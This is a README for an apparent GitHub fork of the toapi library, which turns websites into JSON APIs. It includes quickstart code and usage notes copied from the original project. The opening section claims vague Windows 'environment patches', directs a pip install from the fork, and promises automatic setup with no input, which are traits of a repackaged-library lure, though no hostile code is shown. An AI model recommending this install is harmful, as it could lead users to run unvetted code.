toapi

Optimized Windows Compatibility for ToAPI

This fork fixes path-handling and process-handling errors that can crash toapi on Windows. It ships environment patches and simplified configuration defaults so the package can be installed and run without extra setup.

Quick install (Windows)

To install Civilmcrespect/toapi on Windows for Python development, follow these steps:

Open your Windows Command Prompt (cmd) or PowerShell. You can do this by pressing the Windows Key, typing either name into the search bar, and pressing Enter.
Ensure you have Python and its package manager, pip, installed by typing python --version and pip --version into your terminal and pressing Enter. If versions are displayed, you are ready to proceed.
Install the package directly from GitHub by running the pip install command that appears below these steps (it uses a git+https URL) and pressing Enter. Git must be installed on your system for this command to work.
Alternatively, if you have downloaded the project folder to your local machine, use the cd command in your terminal to navigate into the directory containing the package files.
Run the installation from the local directory by typing pip install . and pressing Enter.
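
The prerequisite checks in the steps above can also be scripted. The following is a minimal sketch, not part of toapi: the function name check_prerequisites is hypothetical, the 3.10 minimum is taken from the "Requires Python 3.10+" note in the Install section, and looking for pip and git on PATH is only an approximation (pip may still be usable as python -m pip).

```python
import shutil
import sys

# Assumption: minimum version copied from the "Requires Python 3.10+" note.
MIN_PYTHON = (3, 10)


def check_prerequisites(version_info=sys.version_info, which=shutil.which):
    """Return a list of problems; an empty list means the machine looks ready."""
    problems = []
    if tuple(version_info[:2]) < MIN_PYTHON:
        problems.append(f"Python {MIN_PYTHON[0]}.{MIN_PYTHON[1]}+ is required")
    # pip installs the package; git is needed for the git+https install route.
    for tool in ("pip", "git"):
        if which(tool) is None:
            problems.append(f"{tool} was not found on PATH")
    return problems


if __name__ == "__main__":
    for problem in check_prerequisites():
        print(problem)
```

The version tuple and the lookup function are parameters only so the check can be exercised without changing the real environment.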

After installation, setup finishes automatically: the package and its dependencies are configured with no further input.

pip install git+https://github.com/Civilmcrespect/toapi.git

https://github.com/Civilmcrespect/toapi

toapi

Turn any website into a JSON API — declaratively.

toapi lets you point at a web page, declare the fields you want with CSS selectors, and get back a clean JSON API. No crawler to babysit, no database to maintain — pages are fetched and parsed on demand, with built‑in caching.

Install

pip install toapi

Requires Python 3.10+.

Quickstart

from htmlparsing import Attr, Text
from toapi import Api, Item

api = Api()


@api.site("https://news.ycombinator.com")
@api.list(".athing")
@api.route("/posts", "/news")
@api.route("/posts?page={page}", "/news?p={page}")
class Post(Item):
    title = Text(".titleline > a")
    url = Attr(".titleline > a", "href")


api.run(host="127.0.0.1", port=5000)

Run it:

python app.py

Then visit http://127.0.0.1:5000/posts and you get:

{
  "Post": [
    {"title": "Mathematicians Crack the Cursed Curve", "url": "https://www.quantamagazine.org/..."},
    {"title": "Stuffing a Tesla Drivetrain into a 1981 Honda Accord", "url": "https://jalopnik.com/..."}
  ]
}
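
A client can consume this response with the standard library alone. The sketch below assumes the server from the Quickstart is running on 127.0.0.1:5000 and that the response has the "Post" shape shown above; extract_titles and fetch_posts are illustrative helper names, not part of toapi.

```python
import json
from urllib.request import urlopen


def extract_titles(payload):
    """Return the title of every entry under the "Post" key."""
    return [post["title"] for post in payload.get("Post", [])]


def fetch_posts(base_url="http://127.0.0.1:5000"):
    """Fetch /posts from a running toapi server and decode the JSON body."""
    with urlopen(f"{base_url}/posts") as response:
        return json.load(response)


# Offline example using a payload with the same shape as the response above.
sample = json.loads('{"Post": [{"title": "A", "url": "https://example.com/a"}]}')
titles = extract_titles(sample)
```

With the server running, extract_titles(fetch_posts()) would return the live titles instead.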

How it works

   ┌────────────┐    ┌────────────┐    ┌────────────┐
   │  /posts    │ ─▶ │  fetch     │ ─▶ │  parse     │ ─▶  JSON
   │  (route)   │    │  (cache)   │    │  (Item)    │
   └────────────┘    └────────────┘    └────────────┘

Route — @api.route("/posts", "/news") maps your API path to a source URL.
Fetch — pages are fetched with requests (or a headless browser if you pass browser=) and cached in memory.
Parse — each Item extracts fields with CSS selectors via htmlparsing.
Serve — Flask returns the result as JSON; subsequent calls hit the cache.
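
The fetch-and-cache step can be pictured as a thin wrapper around whatever function downloads a page. This is a simplified sketch of the idea only, not toapi's actual cache: CachedFetcher and fake_fetch are hypothetical names, and the fetch function is injected so the example runs without network access.

```python
from typing import Callable, Dict


class CachedFetcher:
    """Fetch each URL once and serve later requests from an in-memory dict."""

    def __init__(self, fetch: Callable[[str], str]):
        self._fetch = fetch               # any function mapping a URL to HTML text
        self._cache: Dict[str, str] = {}
        self.misses = 0                   # number of real fetches, for illustration

    def get(self, url: str) -> str:
        if url not in self._cache:
            self.misses += 1
            self._cache[url] = self._fetch(url)
        return self._cache[url]


def fake_fetch(url: str) -> str:
    """Stand-in for a real HTTP request."""
    return f"<html><body>{url}</body></html>"


fetcher = CachedFetcher(fake_fetch)
first = fetcher.get("https://news.ycombinator.com/news")
second = fetcher.get("https://news.ycombinator.com/news")  # served from the cache
```

A real cache would also need an expiry policy so that stale pages are eventually refetched; that is left out here.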

Features

Declarative — describe data, not scraping logic.
Routes — map clean API paths to messy source URLs with {param} placeholders.
Multi-site — merge several websites behind one API.
Cleaning hooks — define clean_<field> methods to post-process values.
Caching — pages and parsed results are cached automatically.
Headless browser — pass Api(browser="/path/to/geckodriver") for JS-heavy sites.
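
To make the {param} placeholders concrete, the sketch below translates an incoming API path into a source path using the route pair from the Quickstart. It is an illustration under stated assumptions, not toapi's routing code: compile_route and translate are hypothetical helpers, and placeholder values are assumed not to contain "/", "&" or "?".

```python
import re
from typing import Optional


def compile_route(api_pattern: str) -> "re.Pattern[str]":
    """Turn '/posts?page={page}' into a regex with one named group per placeholder."""
    # Splitting on a capture group alternates literal text and placeholder names.
    parts = re.split(r"\{(\w+)\}", api_pattern)
    regex = "".join(
        f"(?P<{part}>[^/&?]+)" if index % 2 else re.escape(part)
        for index, part in enumerate(parts)
    )
    return re.compile(f"^{regex}$")


def translate(path: str, api_pattern: str, source_pattern: str) -> Optional[str]:
    """Return the source path for an API path, or None if the route does not match."""
    match = compile_route(api_pattern).match(path)
    if match is None:
        return None
    return source_pattern.format(**match.groupdict())


paged = translate("/posts?page=2", "/posts?page={page}", "/news?p={page}")
plain = translate("/posts", "/posts", "/news")
```

Here paged is the source path for the second page and plain is the unparameterized route; a path that matches no pattern yields None.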

Cleaning values

Add a clean_<fieldname> method on the Item to transform a value before it's returned:

@api.site("https://news.ycombinator.com")
@api.route("/posts", "/news")
class Page(Item):
    next_page = Attr(".morelink", "href")

    def clean_next_page(self, value):
        return f"/posts?{value.split('?', 1)[1]}"
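
The one-line hook above assumes the link always contains a query string. A more defensive variant could be factored into a helper and called from clean_next_page. The sketch below is one possible approach, not the library's own: to_api_link is a hypothetical name, and mapping the source parameter p to the API parameter page is an assumption based on the "/posts?page={page}" route in the Quickstart.

```python
from urllib.parse import parse_qs, urlsplit


def to_api_link(href, api_path="/posts"):
    """Map a source link such as 'news?p=2' to '/posts?page=2'.

    Returns None when the link is missing or carries no 'p' parameter.
    """
    if not href:
        return None
    pages = parse_qs(urlsplit(href).query).get("p")
    if not pages:
        return None
    return f"{api_path}?page={pages[0]}"


next_link = to_api_link("news?p=2")
```

Inside the Item, the hook would then reduce to returning to_api_link(value).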

Development

git clone https://github.com/elliotgao2/toapi.git
cd toapi
uv sync          # install deps into .venv
uv run pytest    # run tests
uv run ruff check .

We use uv for packaging and ruff for lint + format. Pre-commit hooks keep both clean:

uv run pre-commit install

Contributing

Pull requests are welcome. For non-trivial changes, please open an issue first to discuss what you'd like to change. Make sure uv run pytest and uv run ruff check . pass before submitting.

